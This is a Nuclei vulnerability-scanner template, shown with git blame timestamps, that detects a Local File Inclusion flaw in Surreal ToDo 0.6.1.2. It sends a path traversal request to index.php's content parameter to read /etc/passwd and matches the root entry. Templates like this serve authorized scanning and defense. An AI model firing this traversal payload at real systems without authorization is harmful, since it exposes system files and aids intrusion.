nuclei-templates/vulnerabilities/other/surrealtodo-lfi.yaml

29 lines
609 B
YAML
Raw Normal View History

2022-07-20 17:44:17 +00:00
id: surrealtodo-lfi
info:
name: Surreal ToDo 0.6.1.2 - Local File Inclusion
author: arafatansari
2022-07-20 17:50:37 +00:00
severity: high
2022-07-20 17:44:17 +00:00
description: |
Surreal ToDo is affected by Local File Inclusion on index.php via content parameter.
2022-07-20 17:50:37 +00:00
reference:
- https://www.exploit-db.com/exploits/45826
2022-07-20 17:51:03 +00:00
metadata:
verified: true
2022-07-20 17:50:37 +00:00
tags: surreal,lfi
2022-07-20 17:44:17 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200